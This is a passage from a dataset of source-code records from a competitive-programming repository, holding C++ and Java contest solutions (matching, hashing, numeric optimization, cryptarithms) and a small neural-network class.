if (j != -1)\n\t\t for (int v = 0; v < n; v++)\n\t\t if (available[i][v] != -1 && available[u][v] == -1)\n\t\t available[u][v] = j;\n\t\t}\n //fori(n)\n //forj(n)\n //printf(\"%d %d %d\\n\", i, j, available[i][j]);\n //return;\n\t\n fori(n)\n for (int v : a)\n count[i] += available[i][v] != -1;\n if (count[s] != k)\n printAnswerAndExit(\"NO\");\n count[s] = 0;\n for (int v : a)\n nodes.pb({count[v], v});\n nodes.pb({0, t});\n sort(nodes.rbegin(), nodes.rend());\n int l = nodes.size();\n fori(l)\n if (nodes[i].first < l - i - 1)\n printAnswerAndExit(\"NO\");\n\n dfs(s);\n if (answer.size() == 0 || answer.back() != t)\n answer.pb(t);\n\n vector<bool> isAnswerOk(n, true);\n for (int x : a)\n isAnswerOk[x] = false;\n isAnswerOk[t] = false;\n for (int x : answer)\n if (x >= 0 && x < n)\n isAnswerOk[x] = true;\n else\n printAnswerAndExit(\"NO\");\n int ok = accumulate(whole(isAnswerOk), 0);\n if (ok != n)\n printAnswerAndExit(\"NO\");\n\n printf(\"YES\\n\");\n printf(\"%d\\n\", answer.size());\n fori(answer.size())\n printf(\"%d \", answer[i] + 1);\n printf(\"\\n\");\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5517473220825195, "alphanum_fraction": 0.5678763389587402, "avg_line_length": 21.25, "blob_id": "9f6a882cb8bed0bc0eaf98c248b0a1c2cd215dd0", "content_id": "ef0bbd429109ffe80cee090e2708483eab041bd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 83, "num_lines": 64, "path": "/study/task7/ArtificialNeuralNetwork.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.Serializable;\r\nimport java.util.Random;\r\n\r\npublic class ArtificialNeuralNetwork implements Serializable {\r\n\r\n\tstatic Random rand;\r\n\tprivate static final long serialVersionUID = 10L;\r\n\tprivate final static double c = 1;\r\n\tint in, out;\r\n\tint n;\r\n\tLayer[] layers;\r\n\tdouble[] ans;\r\n\tdouble[][] error;\r\n\r\n\tpublic static void writeln(double[] a) {\r\n\t\tfor (int i = 0; i < a.length; i++)\r\n\t\t\tSystem.out.printf(\"%6.3f \", a[i]);\r\n\t\tSystem.out.println();\r\n\t}\r\n\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tpublic ArtificialNeuralNetwork(int... layerSizes) {\r\n\t\tn = layerSizes.length - 1;\r\n\t\tlayers = new Layer[n];\r\n\t\tin = layerSizes[0];\r\n\t\tout = layerSizes[n];\r\n\t\tans = new double[out + 1];\r\n\t\terror = new double[n + 1][];\r\n\t\terror[n] = new double[out + 1];\r\n\t\tfor (int i = 0; i < n; i++)\r\n\t\t\tlayers[i] = new Layer(layerSizes[i], layerSizes[i + 1]);\r\n\t}\r\n\r\n\tvoid get(Digit digit) {\r\n\t\tans = digit.getSignal();\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tans = layers[i].output(ans);\r\n\t\t}\r\n\t}\r\n\r\n\tpublic void add(Digit digit) {\r\n\t\tget(digit);\r\n\t\tfor (int i = 0; i < out; i++)\r\n\t\t\terror[n][i] = -((i != digit.label ? 0 : c) - ans[i]);// * ans[i] * (1 - ans[i]);\r\n\t\tfor (int i = n - 1; i >= 0; --i)\r\n\t\t\terror[i] = layers[i].getError(error[i + 1]);\r\n\t}\r\n\r\n\tpublic int getArgMax(Digit digit) {\r\n\t\tget(digit);\r\n\t\tdouble max = 0;\r\n\t\tint index = 0;\r\n\t\tfor (int i = 0; i < out; i++)\r\n\t\t\tif (ans[i] > max)\r\n\t\t\t\tmax = ans[index = i];\r\n\t\treturn index;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.40635642409324646, "alphanum_fraction": 0.41713961958885193, "avg_line_length": 24.550724029541016, "blob_id": "4f0cf1501041515d0a4c1bb717f6f7fb784d9f7b", "content_id": "f4ace997b96179edcc28a652a30eadf2d1cf88ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1762, "license_type": "no_license", "max_line_length": 110, "num_lines": 69, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/M.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n \ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nstruct tri\n{\n int row, col, bal;\n tri(int bal, int row, int col)\n {\n this->bal = bal;\n this->row = row;\n this->col = col;\n }\n};\n \nint main() {\n// freopen(\"in.in.c\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n cin >> n;\n vector<string> s(n);\n getline(cin, s[0]);\n fori(n)\n getline(cin, s[i]);\n vector<stack<tri> > a(27);\n int balance = 0;\n fori(n)\n forj(s[i].size())\n switch (s[i][j]) {\n case ' ' :\n break;\n case '{' : {\n balance++;\n break;\n }\n case '}' : {\n fori(26)\n if (a[i].size() && a[i].top().bal == balance)\n a[i].pop();\n balance--;\n break;\n }\n default :\n if (a[s[i][j] - 'a'].size())\n printf(\"%d:%d: warning: shadowed declaration of %c, the shadowed position is %d:%d\\n\",\n i + 1, j + 1, s[i][j], a[s[i][j] - 'a'].top().row, a[s[i][j] - 'a'].top().col);\n a[s[i][j] - 'a'].push(tri(balance, i + 1, j + 1));\n }\n return 0;\n}" }, { "alpha_fraction": 0.3849765360355377, "alphanum_fraction": 0.4017437994480133, "avg_line_length": 17.860759735107422, "blob_id": "8e1262e319ebc8a5f9798217dd843e2cb9857cfa", "content_id": "651433ceec70b29f7b7404771323ae646e988aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1491, "license_type": "no_license", "max_line_length": 41, "num_lines": 79, "path": "/trash/lab_da_smthng/minimax/Dcune.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v, int m)\n{\n if (used[v])\n return false;\n used[v] = true;\n for (int i = 1; i <= n; i++)\n {\n if (edges[v][i] < m)\n continue;\n if (d[i] == -1 || dfs(d[i], m))\n {\n d[i] = v;\n return true;\n }\n }\n return false;\n}\n\nint ans(int m)\n{\n d.clear();\n d.resize(n + 1, -1);\n int c = 0;\n for (int i = 1; i <= n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n if (dfs(i, m))\n c++;\n }\n return c;\n}\n\nint main()\n{\n freopen(\"minimax.in\", \"r\", stdin);\n freopen(\"minimax.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n edges.resize(n + 1);\n int x, mx = -1, mn = 1000000001;\n for (int i = 1; i <= n; i++)\n {\n edges[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &edges[i][j]),\n mx = max(mx, edges[i][j]),\n mn = min(mn, edges[i][j]);\n scanf(\"\\n\");\n }\n int l = mn, r = mx, m;\n while (l < r)\n {\n if (l == r - 1)\n {\n ans(r) >= n ? m = r : m = l;\n break;\n }\n m = (r + l) / 2;\n ans(m) >= n ? l = m : r = m;\n }\n printf(\"%d\\n\", m);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n\n" }, { "alpha_fraction": 0.4630891680717468, "alphanum_fraction": 0.4758659899234772, "avg_line_length": 23.45833396911621, "blob_id": "cec8f6f6268bef58c842105c20425a8857f6d524", "content_id": "8155f300c866af977fc385a6d4064c77c7ceca99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3522, "license_type": "no_license", "max_line_length": 125, "num_lines": 144, "path": "/Ann/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\nusing namespace std;\n\nstatic const double eps = 0.05, delta = 0.01;\nstatic const double l = 1., r = 1.5;\n\ndouble f(double x)\n{\n return pow(x, 7) / 7 - pow(x, 3) + x * x / 2 - x;\n}\n\ndouble ff(double x)\n{\n return pow(x, 6) - 3 * pow(x, 2) + x - 1;\n}\n\ndouble fff(double x)\n{\n return 6 * pow(x, 5) - 6 * x + 1;\n}\n\ndouble passiveSearch()\n{\n double x = l, val = l;\n double mn = f(x), temp;\n int countOfOperations = 0;\n double start = clock();\n while (x <= r)\n {\n countOfOperations++;\n temp = f(x);\n if (temp < mn)\n mn = temp,\n val = x;\n x += eps;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return val;\n}\n\ndouble dihotomia()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = a + (b - a) / 2 - delta / 2;\n d = a + (b - a) / 2 + delta / 2;\n if (f(c) >= f(d))\n a = c;\n else\n b = d;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return a + (b - a) / 2;\n}\n\ndouble fi()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = a + (3 - sqrt(5)) * (b - a) / 2;\n d = b - (3 - sqrt(5)) * (b - a) / 2;\n if (f(c) >= f(d))\n a = c;\n else\n b = d;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return a + (b - a) / 2;\n}\n\ndouble tangents()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = (f(b) - f(a) + ff(a) * a - ff(b) * b) / (ff(a) - ff(b));\n if (ff(c) >= 0)\n b = c;\n else\n a = c;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return c;\n}\n\ndouble newton()\n{\n double xk, xprev = 0;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n xk = xprev - ff(xprev) / fff(xprev);\n xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return xk;\n}\n\ndouble chord()\n{\n double xk, xprev = r, xprevprev = l;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n xk = xprev - (xprev - xprevprev) * ff(xprev) / (ff(xprev) - ff(xprevprev));\n xprevprev = xprev;\n xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return xk;\n}\n\nint main()\n{\n cout << \"passiveSearch:\\n\" << passiveSearch() << endl << endl;\n cout << \"dihotomia:\\n\" << dihotomia() << endl << endl;\n cout << \"gold:\\n\" << fi() << endl << endl;\n cout << \"tangents:\\n\" << tangents() << endl << endl;\n cout << \"newton:\\n\" << newton() << endl << endl;\n cout << \"chord:\\n\" << chord() << endl << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.5399588346481323, "alphanum_fraction": 0.5581579208374023, "avg_line_length": 32.97311782836914, "blob_id": "859d1f9c0f3792eed66c9b89ed53f0ae7c16c9c3", "content_id": "4713ef6bd12bb9637a0f5445a2de0bbfdca74f81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 203, "num_lines": 186, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.12.16/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\n#define argmax(a) max_element(whole(a)) - (a).begin()\n#define argmin(a) min_element(whole(a)) - (a).begin()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln (Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln (Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read (Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print (Head& head, Tail&... tail);\ntemplate <class Type1, class Type2> inline void print (pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... tail);\nvoid inline writeln() {printf(\"\\n\");}\nvoid inline writeln2(){printf(\"\\n\");}\nvoid inline readln() {}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n int n;\n readln(n);\n vector<string> s(n);\n readln(s);\n set<char> st;\n fori(n)\n forj(s[i].size())\n st.insert(s[i][j]);\n int m = st.size();\n vi a(10);\n fori(10)\n a[i] = i;\n int answer = 0;\n map<char, int> mp;\n int counter = 0;\n forit(i, st)\n mp[*i] = counter++;\n map<ll, bool> sol;\n vector<vi > d(n, vi(10, -1));\n fori(n)\n forj(s[i].size())\n d[i][10 - s[i].size() + j] = mp[s[i][j]];\n vector<bool> cant(10, false);\n fori(n)\n cant[mp[s[i][0]]] = true;\n vi ans(10);\n ll q;\n int p, cur;\n bool f, can;\n do\n {\n ans.clear();\n ans.resize(10, 0);\n q = a[0];\n fori1(m)\n q = (q * 10) + a[i];\n can = false;\n fori(10)\n can |= a[i] == 0 && cant[i];\n if (sol.find(q) == sol.end() && !can)\n {\n p = 0;\n ROF(j, 9, 0)\n {\n cur = p;\n fori(n - 1)\n if (d[i][j] != -1)\n cur += a[d[i][j]];\n ans[j] = cur % 10;\n p = cur / 10;\n }\n f = p == 0;\n forj(10)\n f &= ans[j] == a[d[n - 1][j]] || d[n - 1][j] == -1 && ans[j] == 0;\n if (f)\n answer++; \n }\n sol[q] = 1;\n }\n while (next_permutation(whole(a)));\n writeln(answer);\n}\n\nint main()\n{\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(const char* a){printf(\" %s\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(long a){printf(\" %ld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(const char* a){printf(\"%s\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long a){printf(\"%ld\", a);}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.5961904525756836, "alphanum_fraction": 0.6137565970420837, "avg_line_length": 36.79999923706055, "blob_id": "5455bfef7f451c5c393437f3442bf9a539d3aaf4", "content_id": "044f1b131103118e5c3fa97fa75667580b6dee11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4725, "license_type": "no_license", "max_line_length": 203, "num_lines": 125, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.11.18/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 17 November 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"binary\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print(Head& head, Tail&... tail);\ntemplate <class Type1, class Type2> inline void print(pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... tail);\nvoid inline writeln(){printf(\"\\n\");}void inline writeln2(){printf(\"\\n\");}void inline readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint m, k;\n\nvoid run()\n{\n readln(m);\n int n = 0;\n for (; (1 << n) < m; n++);\n k = (1 << n) - m;\n n--;\n for(int i = 0; i < k; ++i, printf(\"\\n\"))\n for (int l = n - 1; l >= 0; l--)\n printf(\"%d\", (i & (1 << l)) != 0);\n for(int i = k; i < m; ++i, printf(\"\\n\"))\n for (int l = n; l >= 0; l--)\n printf(\"%d\", ((i + k) & (1 << l)) != 0);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.35684749484062195, "alphanum_fraction": 0.36219897866249084, "avg_line_length": 22.626436233520508, "blob_id": "4522a8f80665571e7d3c5818493de83cae861685", "content_id": "0c7399810f1c1f2b21d0cf5d23b04563c707076e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 81, "num_lines": 174, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/J.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.util.Map.Entry;\nimport java.io.*;\nimport java.math.BigInteger;\n \npublic class J {\n FastScanner in;\n PrintWriter out;\n final String taskName = null;\n \n class Pair {\n int n, r;\n \n Pair(int r) {\n this.n = 1;\n this.r = r;\n }\n }\n \n long p = 31;\n \n Pair ans(char[] str, long[] pow, long[] h, int n, int m, int s) {\n Map<Long, Pair> q = new HashMap<Long, Pair>(n);\n \n for (int r = m - 1; r < n; r++) {\n int l = r - m + 1;\n \n long sum = h[r];\n if (l > 0) {\n sum -= h[l - 1];\n }\n \n sum = (sum * pow[n - l]);\n \n Pair cur = q.get(sum);\n \n if (cur == null) {\n q.put(sum, new Pair(l));\n } else {\n ++cur.n;\n cur.r = l;\n }\n \n // System.out.println(new String(str).substring(l, r + 1) + \" \" +\n // sum);\n \n }\n \n Pair ans = null;\n \n for (Entry<Long, Pair> e : q.entrySet()) {\n if (e.getValue().n >= s && (ans == null || e.getValue().r > ans.r)) {\n ans = e.getValue();\n }\n }\n \n return ans;\n }\n \n public void solve() {\n int m;\n while ((m = in.nextInt()) != 0) {\n char[] str = in.nextLine().toCharArray();\n int n = str.length;\n \n long[] pow = new long[n + 1];\n pow[0] = p;\n for (int i = 1; i <= n; i++) {\n pow[i] = (pow[i - 1] * p) ;\n }\n \n long[] h = new long[n];\n \n h[0] = (p * (str[0] - 'a' + 1)) ;\n \n for (int i = 1; i < n; i++) {\n h[i] = (pow[i] * (str[i] - 'a' + 1) + h[i - 1]) ;\n }\n \n // out.println(Arrays.toString(pow));\n // out.println(Arrays.toString(h));\n \n int l = 1, r = n;\n \n while (r - l > 1) {\n int c = (r + l) / 2;\n Pair ans = ans(str, pow, h, n, c, m);\n if (ans == null || ans.n < m) {\n r = c;\n } else {\n l = c;\n }\n }\n \n Pair y = ans(str, pow, h, n, r, m);\n \n if (y == null || y.n < m) {\n r = l;\n y = ans(str, pow, h, n, r, m);\n }\n \n if (y == null || y.n < m) {\n out.println(\"none\");\n } else {\n out.println(r + \" \" + y.r);\n }\n \n }\n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n String nextLine() {\n try {\n return br.readLine();\n } catch (IOException e) {\n return null;\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n st = new StringTokenizer(nextLine());\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new J().run();\n }\n}\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5266203880310059, "avg_line_length": 31, "blob_id": "ccb7fbde201976c9b22aad2610506c10982a5a55", "content_id": "e4fe48580b52640748b335978b6c04259444c543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3456, "license_type": "no_license", "max_line_length": 174, "num_lines": 108, "path": "/CodeForce/1634/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for 